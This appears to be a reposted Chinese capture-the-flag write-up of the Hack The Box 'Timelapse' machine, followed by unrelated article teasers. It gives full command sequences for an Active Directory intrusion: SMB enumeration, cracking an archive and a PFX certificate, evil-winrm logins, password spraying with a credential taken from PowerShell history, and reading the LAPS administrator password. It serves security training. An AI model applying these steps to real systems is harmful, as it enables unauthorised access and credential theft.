HTB:Timelapse[WriteUP]

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

提取并保存靶机TCP开放端口号

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用nmap对靶机UDP开放端口进行脚本、服务、漏洞扫描

使用enum4linux尝试枚举靶机用户、共享

使用smbmap尝试枚举靶机SMB服务

使用smbclient尝试空密码列出靶机共享

手动枚举靶机SMB共享

尝试解压该压缩包却被提示需要密码

使用rockyou字典仅用0.4s就破解该压缩包密码

使用openssl查看该文件相关信息

尝试询问其他大模型查找该文件密码破解前提

在Kali_Linux直接查找该工具发现是预装好的

直接使用pfx2johnm将该pfx文件转换为哈希格式

边界突破

使用john对该pfx哈希文件进行字典爆破

使用openssl通过上述密码再次查看该pfx信息

使用openssl通过上述密码提取出私钥

使用openssl通过上述密码提取出证书

使用evil-winrm通过上述证书、密钥连接到靶机Win-RM服务

横向移动

查看当前用户权限

查看靶机中存在的用户

将靶机中的所有用户名存储到列表中

查看PS历史命令记录

使用crackmapexec通过该字符串和靶机用户列表进行密码喷洒

使用evil-winrm通过上述凭证登录到靶机Win-RM服务

权限提升

查看当前用户所属组

读取LAPS管理员(通常为域管理员)密码

使用evil-winrm通过上述密码登录到靶机Administrator用户


连接至HTB服务器并启动靶机

靶机IP:10.10.11.152

分配IP:10.10.16.13


信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.11.152 -r 1-65535 --ulimit 5000 | tee res

提取并保存靶机TCP开放端口号
ports=$(grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ','
53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49687,49696
                                                                                                                       
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep syn-ack res | awk -F '/' '{print $1}' | paste -s -d ',')
                                                                                                                       
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49687,49696

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn 10.10.11.152

使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.152

使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.11.152

使用nmap对靶机UDP开放端口进行脚本、服务、漏洞扫描
nmap -sU -p53,123 -sCV --script=vuln -Pn 10.10.11.152

使用enum4linux尝试枚举靶机用户、共享

enum4linux -U -S 10.10.11.152

使用smbmap尝试枚举靶机SMB服务
smbmap -H 10.10.11.152

使用smbclient尝试空密码列出靶机共享
smbclient -L \\10.10.11.152

手动枚举靶机SMB共享

  • 在\Dev目录下可以找到winrm_backup.zip文件

尝试解压该压缩包却被提示需要密码

使用rockyou字典仅用0.4s就破解该压缩包密码

  • 解压出来发现是一个从没见过的文件咋办,上豆包!

PFX 是 Personal Information Exchange 的缩写,PFX 文件是一种二进制格式的文件,用于存储数字证书及其关联的私钥,还可能包含证书链信息。它将公钥证书和私钥捆绑在一起,通常用于在不同的系统和应用程序之间传输证书和密钥信息,以便进行安全通信、身份验证和加密操作。

使用openssl查看该文件相关信息

openssl pkcs12 -info -in legacyy_dev_auth.pfx
  • 这里我尝试了空密码、supremelegacy。均提示密码错误

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# openssl pkcs12 -info -in legacyy_dev_auth.pfx
Enter Import Password:
MAC: sha1, Iteration 2000
MAC length: 20, salt length: 20
Mac verify error: invalid password?

尝试询问其他大模型查找该文件密码破解前提

在Kali_Linux直接查找该工具发现是预装好的
locate pfx2john

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# locate pfx2john    
/usr/bin/pfx2john
/usr/share/john/pfx2john.py
/usr/share/john/__pycache__/pfx2john.cpython-312.pyc

直接使用pfx2johnm将该pfx文件转换为哈希格式
pfx2john legacyy_dev_auth.pfx > pfx_hash

边界突破

使用john对该pfx哈希文件进行字典爆破

john pfx_hash --wordlist=../dictionary/rockyou.txt --format=pfx

thuglegacy

使用openssl通过上述密码再次查看该pfx信息

openssl pkcs12 -info -in legacyy_dev_auth.pfx

使用openssl通过上述密码提取出私钥
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
使用openssl通过上述密码提取出证书
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes
Enter Import Password:
                                                                                                                                   
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem
Enter Import Password:
                                                                                                                                   
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
cert.pem  key.pem  legacyy_dev_auth.pfx  pfx_hash

使用evil-winrm通过上述证书、密钥连接到靶机Win-RM服务

evil-winrm -S -k key.pem -c cert.pem -i 10.10.11.152

  • 在该用户桌面可找到user.txt

*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls


    Directory: C:\Users\legacyy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/9/2025   7:38 AM             34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
02f15a49b2b79e3dbbb4f2e74cddb970


横向移动

查看当前用户权限

whoami /priv

*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

查看靶机中存在的用户

net user
  • 这里有个payl0ad用户有点奇怪,可能是我这个靶机有其他HACKER一起打过?

*Evil-WinRM* PS C:\Users\legacyy\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babywyrm                 Guest
krbtgt                   legacyy                  payl0ad
sinfulz                  svc_deploy               thecybergeek
TRX
The command completed with one or more errors.

将靶机中的所有用户名存储到列表中
cat user_list

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat user_list
Administrator
babywyrm
Guest
krbtgt
legacyy
payl0ad
sinfulz
svc_deploy
thecybergeek
TRX

查看PS历史命令记录

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

  • 我注意到其中的字符串`E3R$Q62^12p7PLlC%KWaxuaV`

使用crackmapexec通过该字符串和靶机用户列表进行密码喷洒

crackmapexec smb 10.10.11.152 -p 'E3R$Q62^12p7PLlC%KWaxuaV' -u user_list

  • 获得svc_deploy用户完整凭证

账户:svc_deploy

密码:E3R$Q62^12p7PLlC%KWaxuaV

使用evil-winrm通过上述凭证登录到靶机Win-RM服务

evil-winrm -i 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S


权限提升

查看当前用户所属组

net user svc_deploy

  • 由输出可见,当前用户为LAPS_Readers组用户

读取LAPS管理员(通常为域管理员)密码

Get-ADComputer dc01 -property 'ms-mcs-admpwd'

8.VHRj!(T7bJk@d(y%%[(x1+

使用evil-winrm通过上述密码登录到靶机Administrator用户

evil-winrm -i 10.10.11.152 -u 'Administrator' -p '8.VHRj!(T7bJk@d(y%%[(x1+' -S

  • 在C:\Users\TRX\Desktop目录下找到root.txt

*Evil-WinRM* PS C:\Users\TRX\Desktop> ls


    Directory: C:\Users\TRX\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/9/2025   7:38 AM             34 root.txt


*Evil-WinRM* PS C:\Users\TRX\Desktop> gc root.txt
95cee173d9be3d1d7eda98b25e475eac

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/66729.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【贵州省】乡镇界arcgis格式shp数据乡镇名称和编码内容下载测评

shp数据字段乡镇名称和编码,坐标是wgs84,数据为SHP矢量格式,下载下来直接加载进ArcMap即可使用 下载地址:https://download.csdn.net/download/zhongguonanren99/14928126

《鸿蒙系统AI技术:筑牢复杂网络环境下的安全防线》

在当今数字化时代,复杂网络环境给智能系统带来了诸多安全挑战,而鸿蒙系统中的人工智能技术却展现出强大的安全保障能力,为用户在复杂网络环境中的安全保驾护航。 微内核架构:安全基石 鸿蒙系统采用微内核架构,将核心…

[免费]微信小程序(高校就业)招聘系统(Springboot后端+Vue管理端)【论文+源码+SQL脚本】

大家好,我是java1234_小锋老师,看到一个不错的微信小程序(高校就业)招聘系统(Springboot后端Vue管理端),分享下哈。 项目视频演示 【免费】微信小程序(高校就业)招聘系统(Springboot后端Vue管理端) Java毕业设计_哔哩哔哩_bilibili 项目介绍…

“AI智能实训系统:让学习更高效、更轻松!

大家好,作为一名资深产品经理,今天我来跟大家聊聊一款备受瞩目的产品——AI智能实训系统。在这个人工智能技术飞速发展的时代,AI智能实训系统应运而生,为广大学习者提供了全新的学习体验。那么,这款产品究竟有哪些亮点…

Linux下字符设备驱动编写(RK3568)

文章目录 一 基础知识概念特点常见应用场景 二 linux 下的字符设备字符设备在 /dev 目录下用 ls -l 命令查看字符设备文件类型主设备号和次设备号 三 字符驱动模块的编写1. 头文件引入2. 定义错误码枚举3. 设备操作函数定义4. 关键结构体与变量定义5. 驱动入口函数(…

Lua语言的数据类型

Lua语言的数据类型详解 Lua是一种轻量级、高效的脚本语言,广泛应用于游戏开发、嵌入式系统等领域。它的灵活性和简洁性是其受欢迎的因素之一。其中,Lua的基本数据类型构成了语言的基础,使得开发者可以更高效地处理各种数据。本文将全面介绍L…

ubuntu20下编译linux1.0 (part1)

author: hjjdebug date: 2025年 01月 09日 星期四 15:56:15 CST description: ubuntu20下编译linux1.0 (part1) 该博客记录了新gcc编译旧代码可能碰到的问题和解决办法, 可留作参考 操作环境: ubuntu20 $ gcc --version gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0 $ as --vers…

C#语言的数据库编程

C#语言的数据库编程 在现代软件开发中,数据库是不可或缺的一部分。无论是企业级应用还是个人项目,数据的存储与管理都是程序的核心功能之一。C#作为一种强类型、面向对象的编程语言,广泛应用于Windows平台的开发,尤其是在构建与数…

前端性能优化全攻略:加速网页加载,提升用户体验

前端性能优化全攻略:加速网页加载,提升用户体验 在当今互联网时代,用户对于网页的加载速度和性能要求越来越高。一个快速响应、流畅加载的网页能够极大地提升用户体验,增加用户留存率和满意度。前端性能优化是实现这一目标的关键…

如何禁用win10个人数据跨境传输

由于2023年起,windows系统将进行个人数据的跨境传输,若您关注个人信息安全,希望阻止该情况,请关注本次分享,并采取以下有效步骤: 1.使用本地账户代替微软账户。首先,您需要关闭"Connected…

【ROS2】RViz2加载URDF模型文件

1、RViz2加载URDF模型文件 1)运行RViz2 rviz22)添加组件:RobotModel 3)选择通过文件添加 4)选择URDF文件,此时会报错,需要修改Fixed Frame为map即可 5)因为没有坐标转换,依然会报错,下面尝试解决 2、运行坐标转换节点 1)运行ROS节点:robot_state_publishe

大数据组件(三)快速入门实时计算平台Dinky

大数据组件(三)快速入门实时计算平台Dinky Dinky 是一个开箱即用的一站式实时计算平台(同样,还有StreamPark),以 Apache Flink 为基础,连接数据湖仓等众多框架,致力于流批一体和湖仓一体的建设与实践。 Di…

TANGO - 数字人全身动作生成

文章目录 一、关于 TANGO演示视频(YouTube)📝发布计划 二、⚒️安装克隆存储库构建环境 三、🚀训练和推理1、推理2、为自定义字符创建图形 一、关于 TANGO TANGO 是 具有分层音频运动嵌入 和 扩散插值的共语音手势视频再现 由东…

1月9日星期四今日早报简报微语报早读

1月9日星期四,农历腊月初十,早报#微语早读。 1、上海排查47家“俄罗斯商品馆”:个别店铺被责令停业,立案调查; 2、西藏定日县已转移受灾群众4.65万人,检测到余震646次; 3、国家发改委&#x…

Zemax 序列模式下的扩束器

扩束器结构原理 扩束器用于增加准直光束(例如激光束)的直径,同时保持其准直。它通常用于激光光学和其他需要修改光束大小或发散度的应用。 在典型的扩束器中,输入光束是准直激光器,或光束进入第一个光学元件。当光束开…

【TI毫米波雷达】DCA1000不使用mmWave Studio的数据采集方法,以及自动化实时数据采集

【TI毫米波雷达】DCA1000不使用mmWave Studio的数据采集方法,以及自动化实时数据采集 mmWave Studio提供的功能完全够用了 不用去纠结用DCA1000低延迟、无GUI传数据 速度最快又保证算力无非就是就是Linux板自己写驱动做串口和UDP 做雷达产品应用也不会采用DCA1000的…

Kubernetes Gateway API-4-TCPRoute和GRPCRoute

1 TCPRoute 目前 TCP routing 还处于实验阶段。 Gateway API 被设计为与多个协议一起工作,TCPRoute 就是这样一个允许管理TCP流量的路由。 在这个例子中,我们有一个 Gateway 资源和两个 TCPRoute 资源,它们按照以下规则分配流量&#xff1…

测试覆盖率

1、概念 覆盖率测试,也称为测试覆盖率分析,是软件测试中的一个重要概念,用来衡量测试用例执行时对代码的覆盖程度。它提供了一种量化的方法来评估测试集的充分性,即测试是否足够广泛地触及了应用程序的所有部分。覆盖率测试可以应…

提升决策支持:五大报表软件功能全面评测

本文将为大家介绍五款功能强大的报表软件,包括山海鲸报表、JReport、Power BI、Zoho Analytics 和 SAP Crystal Reports。这些工具各具特色,能够帮助企业快速生成数据报表并进行深度分析。无论是数据可视化、报表定制、自动化生成还是与其他系统的集成&a…

Backend - C# EF Core 执行迁移 Migrate

目录 一、创建Postgre数据库 二、安装包 (一)查看是否存在该安装包 (二)安装所需包 三、执行迁移命令 1. 作用 2. 操作位置 3. 执行(针对visual studio) 查看迁移功能的常用命令: 查看…